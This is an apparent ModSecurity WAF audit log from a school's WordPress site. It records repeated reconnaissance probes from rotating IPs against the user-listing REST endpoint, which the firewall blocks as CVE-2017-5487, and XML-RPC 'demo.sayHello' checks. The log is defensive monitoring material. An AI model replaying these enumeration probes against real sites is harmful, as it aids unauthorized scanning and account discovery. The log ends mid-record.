Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dbbc442-Z-- --9e607e65-A-- [05/May/2025:22:47:55 +0700] aBjdq4ZWvR7-42f6JrAK3QAAAMs 103.236.140.4 36720 103.236.140.4 8181 --9e607e65-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9e607e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e607e65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460075514250 2758 (- - -) Stopwatch2: 1746460075514250 2758; combined=1416, p1=461, p2=925, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e607e65-Z-- --91892f39-A-- [05/May/2025:22:47:58 +0700] aBjdroZWvR7-42f6JrAK4wAAANI 103.236.140.4 36744 103.236.140.4 8181 --91892f39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --91892f39-C-- demo.sayHello --91892f39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --91892f39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460078276168 5808 (- - -) Stopwatch2: 1746460078276168 5808; combined=4345, p1=548, p2=3567, p3=35, p4=35, p5=95, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91892f39-Z-- --097e0e3b-A-- [05/May/2025:22:48:08 +0700] aBjduIZWvR7-42f6JrAK6QAAAM4 103.236.140.4 36836 103.236.140.4 8181 --097e0e3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --097e0e3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --097e0e3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460088087315 3311 (- - -) Stopwatch2: 1746460088087315 3311; combined=1458, p1=481, p2=942, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --097e0e3b-Z-- --5b44ad17-A-- [05/May/2025:22:48:11 +0700] aBjdu4ZWvR7-42f6JrAK7AAAAMo 103.236.140.4 36872 103.236.140.4 8181 --5b44ad17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.150 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5b44ad17-C-- demo.sayHello --5b44ad17-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b44ad17-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460091854952 5544 (- - -) Stopwatch2: 1746460091854952 5544; combined=4375, p1=568, p2=3569, p3=31, p4=36, p5=100, sr=75, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b44ad17-Z-- --58bf020e-A-- [05/May/2025:22:48:26 +0700] aBjdyoZWvR7-42f6JrAK9gAAANA 103.236.140.4 36992 103.236.140.4 8181 --58bf020e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58bf020e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58bf020e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460106440344 2934 (- - -) Stopwatch2: 1746460106440344 2934; combined=1287, p1=443, p2=815, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58bf020e-Z-- --d4f8607b-A-- [05/May/2025:22:48:28 +0700] aBjdzIZWvR7-42f6JrAK-gAAAMo 103.236.140.4 37004 103.236.140.4 8181 --d4f8607b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d4f8607b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4f8607b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460108225897 2777 (- - -) Stopwatch2: 1746460108225897 2777; combined=1203, p1=410, p2=759, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4f8607b-Z-- --3ae9cd6a-A-- [05/May/2025:22:48:29 +0700] aBjdzU2V_h1VFAgsfgZ6YwAAAA8 103.236.140.4 37014 103.236.140.4 8181 --3ae9cd6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3ae9cd6a-C-- demo.sayHello --3ae9cd6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ae9cd6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460109500178 5613 (- - -) Stopwatch2: 1746460109500178 5613; combined=4350, p1=514, p2=3544, p3=94, p4=36, p5=95, sr=71, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ae9cd6a-Z-- --fa76f87a-A-- [05/May/2025:22:48:30 +0700] aBjdzoZWvR7-42f6JrAK_AAAAMQ 103.236.140.4 37032 103.236.140.4 8181 --fa76f87a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fa76f87a-C-- demo.sayHello --fa76f87a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa76f87a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460110986779 5743 (- - -) Stopwatch2: 1746460110986779 5743; combined=4169, p1=545, p2=3402, p3=28, p4=30, p5=96, sr=71, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa76f87a-Z-- --c8fbee5e-A-- [05/May/2025:22:48:52 +0700] aBjd5E2V_h1VFAgsfgZ6cgAAAA4 103.236.140.4 37200 103.236.140.4 8181 --c8fbee5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c8fbee5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8fbee5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460132359324 3771 (- - -) Stopwatch2: 1746460132359324 3771; combined=2183, p1=678, p2=1470, p3=0, p4=0, p5=35, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8fbee5e-Z-- --881cd821-A-- [05/May/2025:22:48:55 +0700] aBjd5wRwKNFSM6B7_LaeZwAAAIE 103.236.140.4 37216 103.236.140.4 8181 --881cd821-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --881cd821-C-- demo.sayHello --881cd821-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --881cd821-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460135135483 5556 (- - -) Stopwatch2: 1746460135135483 5556; combined=4096, p1=505, p2=3371, p3=29, p4=31, p5=94, sr=75, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --881cd821-Z-- --a0e6cb60-A-- [05/May/2025:22:48:56 +0700] aBjd6E2V_h1VFAgsfgZ6dQAAABI 103.236.140.4 37238 103.236.140.4 8181 --a0e6cb60-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a0e6cb60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0e6cb60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460136932339 3068 (- - -) Stopwatch2: 1746460136932339 3068; combined=1302, p1=455, p2=812, p3=0, p4=0, p5=35, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0e6cb60-Z-- --041f0935-A-- [05/May/2025:22:48:59 +0700] aBjd6wRwKNFSM6B7_LaeaQAAAIA 103.236.140.4 37262 103.236.140.4 8181 --041f0935-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --041f0935-C-- demo.sayHello --041f0935-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --041f0935-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460139688752 5599 (- - -) Stopwatch2: 1746460139688752 5599; combined=4134, p1=527, p2=3381, p3=33, p4=35, p5=93, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --041f0935-Z-- --bfe6332e-A-- [05/May/2025:22:50:39 +0700] aBjeTwRwKNFSM6B7_LaejwAAAI4 103.236.140.4 38038 103.236.140.4 8181 --bfe6332e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.0 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bfe6332e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfe6332e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460239440170 2695 (- - -) Stopwatch2: 1746460239440170 2695; combined=1204, p1=408, p2=767, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfe6332e-Z-- --fbf7cd68-A-- [05/May/2025:22:50:42 +0700] aBjeUvZJDMuQndL03JNaTwAAAFY 103.236.140.4 38070 103.236.140.4 8181 --fbf7cd68-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.0 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fbf7cd68-C-- demo.sayHello --fbf7cd68-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbf7cd68-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460242219100 6015 (- - -) Stopwatch2: 1746460242219100 6015; combined=4371, p1=542, p2=3593, p3=31, p4=35, p5=99, sr=78, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbf7cd68-Z-- --b4297b3e-A-- [05/May/2025:22:51:09 +0700] aBjebU2V_h1VFAgsfgZ6twAAAA0 103.236.140.4 38330 103.236.140.4 8181 --b4297b3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4297b3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4297b3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460269764984 2539 (- - -) Stopwatch2: 1746460269764984 2539; combined=1207, p1=494, p2=689, p3=0, p4=0, p5=24, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4297b3e-Z-- --ac682031-A-- [05/May/2025:22:51:12 +0700] aBjecE2V_h1VFAgsfgZ6uQAAAAs 103.236.140.4 38348 103.236.140.4 8181 --ac682031-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ac682031-C-- demo.sayHello --ac682031-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac682031-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460272665128 5963 (- - -) Stopwatch2: 1746460272665128 5963; combined=4439, p1=572, p2=3633, p3=35, p4=34, p5=97, sr=77, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac682031-Z-- --28a79f72-A-- [05/May/2025:22:51:22 +0700] aBjeegRwKNFSM6B7_LaepwAAAIg 103.236.140.4 38424 103.236.140.4 8181 --28a79f72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --28a79f72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28a79f72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file 